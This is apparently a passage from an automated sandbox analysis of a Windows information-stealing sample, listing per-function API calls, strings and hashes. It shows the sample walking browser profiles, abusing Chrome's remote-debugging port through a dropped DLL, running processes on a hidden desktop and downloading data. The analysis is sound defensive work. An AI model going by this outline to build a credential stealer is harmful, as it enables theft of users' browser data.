concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 2127927946-2218711628
Opcode ID: 63e2d25afccf2068cdd63106ff2e1bb17fa71763db692633bb80c214bec16742
Instruction ID: d9454edd25cb62b7450a4763d13550f3bb5c9799c0ee6799afef423c86a6600d
Opcode Fuzzy Hash: 63e2d25afccf2068cdd63106ff2e1bb17fa71763db692633bb80c214bec16742
Instruction Fuzzy Hash: A5412F79740624ABD7109FE5FC4DADCBF60AB4C711BA08062F90A89190C7F993859B7D

Function 0040BE40 Relevance: 63.7, APIs: 29, Strings: 7, Instructions: 727
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2F,00000000,?,?,?,00421450,00420B2E), ref: 0040BEC5
StrCmpCA.SHLWAPI(?,00421454), ref: 0040BF33
StrCmpCA.SHLWAPI(?,00421458), ref: 0040BF49
FindNextFileA.KERNEL32(000000FF,?), ref: 0040C8A9
FindClose.KERNEL32(000000FF), ref: 0040C8BB

Strings

Google Chrome, xrefs: 0040C6F8
\Brave\Preferences, xrefs: 0040C1C1
--remote-debugging-port=9229 --profile-directory=", xrefs: 0040C3B2
--remote-debugging-port=9229 --profile-directory=", xrefs: 0040C534
--remote-debugging-port=9229 --profile-directory=", xrefs: 0040C495
Preferences, xrefs: 0040C104
Brave, xrefs: 0040C0E8

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-1869280968
Opcode ID: 8c10b31f0adb3e0c37c025a6fb508ed1d13c0a43c1a0a4afaa21e9cc6fb2d40a
Instruction ID: 94c18d54b217f3a33de79012ae3cbc39d408ee074d55138b38aa149d1ce8c153
Opcode Fuzzy Hash: 8c10b31f0adb3e0c37c025a6fb508ed1d13c0a43c1a0a4afaa21e9cc6fb2d40a
Instruction Fuzzy Hash: 5C52A871A011049BCB14FB61DC96EEE733DAF54304F4045AEF50A66091EF386B98CFAA

Function 00413B00 Relevance: 47.5, APIs: 21, Strings: 6, Instructions: 250
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00413B1C
FindFirstFileA.KERNEL32(?,?), ref: 00413B33
lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
FindNextFileA.KERNELBASE(000000FF,?), ref: 00413EB7
FindClose.KERNEL32(000000FF), ref: 00413ECC

Strings

%s\%s, xrefs: 00413BCA
q?A, xrefs: 00413ED2, 00413E95, 00413DB9, 00413B59, 00413DBC, 00413E98
%s\%s\%s, xrefs: 00413C9A
%s%s, xrefs: 00413CFD
%s\*, xrefs: 00413B10
%s\%s, xrefs: 00413CBF

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$q?A
API String ID: 1125553467-4052298153
Opcode ID: 64dafc09d7dd95890a0863d33504cf09d968bf0fecc1c854b6c5825856e3e306
Instruction ID: 118bc6de907018410b19fab89ebe74f6f374c1ff32bc5bb8bfd4c4c53b142975
Opcode Fuzzy Hash: 64dafc09d7dd95890a0863d33504cf09d968bf0fecc1c854b6c5825856e3e306
Instruction Fuzzy Hash: E9A141B1A042189BDB24DF64DC85FEA7379BB48301F44458EF60D96181EB74AB88CF66

Function 00414B60 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00414B7C
FindFirstFileA.KERNEL32(?,?), ref: 00414B93
StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
FindClose.KERNEL32(000000FF), ref: 00414DE2

Strings

-SA, xrefs: 00414DE8, 00414DAB, 00414D54, 00414BA8, 00414D57, 00414DAE
%s\*, xrefs: 00414B70
%s\%s, xrefs: 00414BF4
%s\%s, xrefs: 00414C4B

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*$-SA
API String ID: 180737720-309722913
Opcode ID: 656b9b7d3a8eee4762debc90e6b1e3c8a7130f795a62e609ea20762d8e2c8e22
Instruction ID: 6eceda3e2f2aeeb228f448c6629b31eb3c314648a2220d8d34325ba683034fba
Opcode Fuzzy Hash: 656b9b7d3a8eee4762debc90e6b1e3c8a7130f795a62e609ea20762d8e2c8e22
Instruction Fuzzy Hash: F2617771904218ABCB20EBA0ED45FEA737DBF48701F40458EF60996191FB74AB84CF95

Function 00409E30 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 157stringsleepprocessCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00409E47

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02D21940,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

wsprintfA.USER32 ref: 00409E7F
OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409EA3
CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409ECC
memset.MSVCRT ref: 00409EED
lstrcatA.KERNEL32(00000000,?), ref: 00409F03
lstrcatA.KERNEL32(00000000,?), ref: 00409F17
lstrcatA.KERNEL32(00000000,004212D8), ref: 00409F29
memset.MSVCRT ref: 00409F3D
lstrcpy.KERNEL32(?,00000000), ref: 00409F7C
memset.MSVCRT ref: 00409F9C
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 0040A004
Sleep.KERNEL32(00001388), ref: 0040A013
CloseDesktop.USER32(00000000), ref: 0040A060

Strings

D, xrefs: 00409FA4

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: memset$Desktoplstrcat$Create$CloseOpenProcessSleepSystemTimelstrcpywsprintf
String ID: D
API String ID: 1347862506-2746444292
Opcode ID: 7c29a0535b3fd9f67642ff392d8ceddf8f662d9b888e79f8ec205aec3636adac
Instruction ID: 9351db1e319cd03a78e50f41365f33c4a7b54471eb3ec1f6bde0cae738676000
Opcode Fuzzy Hash: 7c29a0535b3fd9f67642ff392d8ceddf8f662d9b888e79f8ec205aec3636adac
Instruction Fuzzy Hash: B551B3B1D04318ABDB20DF60DC4AFDA7778AB48704F004599F60DAA2D1EB75AB84CF55

Function 00405000 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 82networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040501A
RtlAllocateHeap.NTDLL(00000000), ref: 00405021
InternetOpenA.WININET(00420DE3,00000000,00000000,00000000,00000000), ref: 0040503A
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405061
InternetReadFile.WININET(+aA,?,00000400,00000000), ref: 00405091
memcpy.MSVCRT(00000000,?,00000001), ref: 004050DA
InternetCloseHandle.WININET(+aA), ref: 00405109
InternetCloseHandle.WININET(?), ref: 00405116

Strings

+aA, xrefs: 00405105, 0040508D, 00405090, 00405108
+aA, xrefs: 00405051, 00405134

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
String ID: +aA$+aA
API String ID: 1008454911-2425922966
Opcode ID: 7b9ae971f76d26b679a06edd5b08f7635e532632f21804a6d52d55792fbc9a1b
Instruction ID: fde31ff110f26a7c533ed41685ed538a2d60c52cc522202a3453e975d8f44226
Opcode Fuzzy Hash: 7b9ae971f76d26b679a06edd5b08f7635e532632f21804a6d52d55792fbc9a1b
Instruction Fuzzy Hash: 193136B4E01218ABDB20CF54DC85BDDB7B5EB48304F1081EAFA09A7281D7746AC18F9D

Function 0040F7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004216B0,00420D97), ref: 0040F81E
StrCmpCA.SHLWAPI(?,004216B4), ref: 0040F86F
StrCmpCA.SHLWAPI(?,004216B8), ref: 0040F885
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040FBB1
FindClose.KERNEL32(000000FF), ref: 0040FBC3

Strings

prefs.js, xrefs: 0040F912

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: c6bfd9071aa7d93344e37a85f27f57352c515dc0e4db4f68e1a7fac48331d099
Instruction ID: 41002e5bbb8aa5eaa1de2a73ae7baa64e6dc855d43d68c47d205a656f8df75cd
Opcode Fuzzy Hash: c6bfd9071aa7d93344e37a85f27f57352c515dc0e4db4f68e1a7fac48331d099
Instruction Fuzzy Hash: 84B19371A011089BCB24FF61DC96FEE7379AF54304F0045AEA50A57191EF386B98CF9A

Function 00401710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042524C,?,00401F6C,?,004252F4,?,?,00000000,?,00000000), ref: 00401963
StrCmpCA.SHLWAPI(?,0042539C), ref: 004019B3
StrCmpCA.SHLWAPI(?,00425444), ref: 004019C9
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D80
DeleteFileA.KERNEL32(00000000), ref: 00401E0A
FindNextFileA.KERNEL32(000000FF,?), ref: 00401E60
FindClose.KERNEL32(000000FF), ref: 00401E72

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Strings

\*.*, xrefs: 00401831

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: b806c316a107a852de10508292e59d45bbdbac333e94b59aa814e5787bd517f9
Instruction ID: 8dceb2dbebed1ef5653663fcf5a424c9e51ac6dcd96391736e9d2a9429382604
Opcode Fuzzy Hash: b806c316a107a852de10508292e59d45bbdbac333e94b59aa814e5787bd517f9
Instruction Fuzzy Hash: DA125171A111189BCB15FB61DCA6EEE7339AF14314F4045EEB10662091EF386BD8CF99

Function 0040DB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215A8,00420BAF), ref: 0040DBEB
StrCmpCA.SHLWAPI(?,004215AC), ref: 0040DC33
StrCmpCA.SHLWAPI(?,004215B0), ref: 0040DC49
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040DECC
FindClose.KERNEL32(000000FF), ref: 0040DEDE

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: d554cb57338e2f5f6f3c9f8b8f91b42bf42663e45667eb1fe69c2f8ad9670917
Instruction ID: c85deeef17d72a94dc1f170446f25d55197e78b42259dde6f56d7dfc7a2e5770
Opcode Fuzzy Hash: d554cb57338e2f5f6f3c9f8b8f91b42bf42663e45667eb1fe69c2f8ad9670917
Instruction Fuzzy Hash: 40917572A001049BCB14FBB1ED96DED733DAF84344F00456EF90666185EE38AB5CCB9A

Function 0040A090 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098
GetProcAddress.KERNEL32(6D0C0000,connect_to_websocket), ref: 0040A0BE
GetProcAddress.KERNEL32(6D0C0000,free_result), ref: 0040A0D5
FreeLibrary.KERNEL32(6D0C0000,?,004108E4), ref: 0040A0F9

Strings

connect_to_websocket, xrefs: 0040A0B3
C:\ProgramData\chrome.dll, xrefs: 0040A093
free_result, xrefs: 0040A0C9

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$FreeLoad
String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
API String ID: 2256533930-1545816527
Opcode ID: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
Instruction ID: 41317d004e32df3368e0b40b2df30f060e9b3f1c7a199a11b2b6647de007d5a9
Opcode Fuzzy Hash: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
Instruction Fuzzy Hash: 57F01DB4E0E324EFD7009B60ED48B563BA6E318341F506437F505AB2E0E3B85494CB6B

Function 004198E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00419905
Process32First.KERNEL32(00409FDE,00000128), ref: 00419919
Process32Next.KERNEL32(00409FDE,00000128), ref: 0041992E
StrCmpCA.SHLWAPI(?,00409FDE), ref: 00419943
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041995C
TerminateProcess.KERNEL32(00000000,00000000), ref: 0041997A
CloseHandle.KERNEL32(00000000), ref: 00419987
CloseHandle.KERNEL32(00409FDE), ref: 00419993

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
